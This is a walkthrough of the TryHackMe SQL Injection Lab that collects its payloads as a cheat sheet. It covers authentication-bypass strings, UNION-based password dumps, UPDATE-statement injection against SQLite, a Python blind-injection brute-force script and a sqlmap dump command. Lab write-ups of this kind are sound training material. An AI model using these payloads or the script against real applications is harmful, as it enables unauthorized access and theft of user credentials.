Description: Understand how SQL injection attacks work and how to exploit this vulnerability.

Tags: security, sqli, sqlmap, web

Difficulty: Easy

Host: TryHackMe | SQL Injection Lab (by Fafa and eXistens) - https://tryhackme.com/room/sqlilab

This is just a quick walkthrough and basically just a collection of the payloads as a nice cheat sheet.

1. Introduction

2. Introduction to SQL Injection: Part 1

2.1 What is the flag for SQL Injection 1: Input Box Non-String?

 1 OR 1=1 -- -

2.2 What is the flag for SQL Injection 2: Input Box String?

 1' OR '1'='1'-- -

2.3 What is the flag for SQL Injection 3: URL Injection?

Basic payload:

 [...]/login?profileID=-1' or 1=1-- -&password=a

Encoded payload:

 [...]/login?profileID=-1%27%20or%201=1--%20-&password=a

2.4 What is the flag for SQL Injection 4: POST Injection?

POST request

3. Introduction to SQL Injection: Part 2

3.1 What is the flag for SQL Injection 5: UPDATE Statement?

First login with 10:toor, went to "Edit Profile" and tested the vulnerability by entering the following data into the "nickName" field.

Source code
 asd',nickName='test',email='hacked

But only "nickName" gets updated. Then I entered it to "email" and it worked. I got the version number 3.22.0 with SQLite

 asd',nickName=sqlite_version(),email='hacked

To dump the table names

 ',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

usertable and secrets. To dump column names of it

 ',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='

Output was
CREATE TABLE secrets ( id integer primary key, author integer not null, secret text not null )

Then extracted the data with

 ',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='

Alternatively it's possible with:

 ',nickName=(SELECT group_concat(secret) from secrets),email='

4. Vulnerable Startup: Broken Authentication

4.1 What is the flag for this challenge?

 ' OR 1=1-- -

5. Vulnerable Startup: Broken Authentication 2

5.1 What is the flag for this challenge?

I logged in as before with

 ' OR 1=1-- -

Then login finding out the columns

 ' UNION SELECT 1,2-- -

Extracting the passwords from the users table

 ' UNION SELECT 1,group_concat(password) FROM users-- -

6. Vulnerable Startup: Broken Authentication 3 (Blind Injection)

6.1 What is the flag for this challenge?

Getting the length of the password with

 admin' AND length((SELECT password from users where username='admin'))==37-- -

Script for blind SQLi.

 #!/usr/bin/python3 import sys import requests import string   def send_p(url, query):     payload = {"username": query, "password": "admin"}     try:         r = requests.post(url, data=payload, timeout=3)     except requests.exceptions.ConnectTimeout:         print("[!] ConnectionTimeout: Try to adjust the timeout time")         sys.exit(1)     return r.text   def main(addr):     url = f"http://{addr}/challenge3/login"     flag = ""     password_len = 38     # Not the most efficient way of doing it...     for i in range(1, password_len):         for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":             # Convert char to hex and remove "0x"             h = hex(ord(c))[2:]             query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \                 f"{i},1)=CAST(X'{h}' AS TEXT)--"              resp = send_p(url, query)             if not "Invalid" in resp:                 flag += c                 print(flag)     print(f"[+] FLAG: {flag}")   if __name__ == "__main__":     if len(sys.argv) == 1:         print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")         sys.exit(0)     main(sys.argv[1])

Alternative:

 sqlmap -u http://'machine-ip':5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump

7. Vulnerable Startup: Vulnerable Notes

7.1 What is the flag for this challenge?

Register with

 ' UNION SELECT 1,2'

and login. With this, the next exploit is visible.

UNION SELECT user

Get tables from database with

 ' UNION SELECT 1,group_concat(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%''

Tables are users and notes. And to catch the flag

 ' UNION SELECT 1,group_concat(password) FROM users'

8. Vulnerable Startup: Change Password

8.1 What is the flag for this challenge?

Registered and logged in with

 admin'-- -

Changed the password and the password got changed for the "admin" user. Logged out and back in with "admin".

9. Vulnerable Startup: Book Title

9.1 What is the flag for this challenge?

Register/login and link click. Title

 ') OR 1=1-- -

I got an output with four columns and the UNION SELECT statement

 ') UNION SELECT NULL,NULL,NULL,NULL-- -

So I replaced every NULL value with numbers

 ') UNION SELECT 1,2,3,4-- -

Just to be sure I checked the version and the backend with

 ') UNION SELECT 1,sqlite_version(),3,4-- -

and got "3.22.0" as the version number as an output. To get the flag I entered

 ') UNION SELECT 1,group_concat(password),3,4 FROM users-- -

10. Vulnerable Startup: Book Title 2

10.1 What is the flag for this challenge?

Registered and logged in.

 ' UNION SELECT 'STRING

Got no output as intended. The payload

 ' UNION SELECT '1'-- -

dumped the first entry. To get the working statement I used the payload from the task

 ' UNION SELECT '-1''UNION SELECT 1,2,3,4-- -

and edited it to get the flag.

 ' UNION SELECT '-1''UNION SELECT 1,group_concat(password),3,4 FROM users-- -

11. Thank you!

No. Thank you for creating this awesome room!

 This free site is ad-supported. Learn more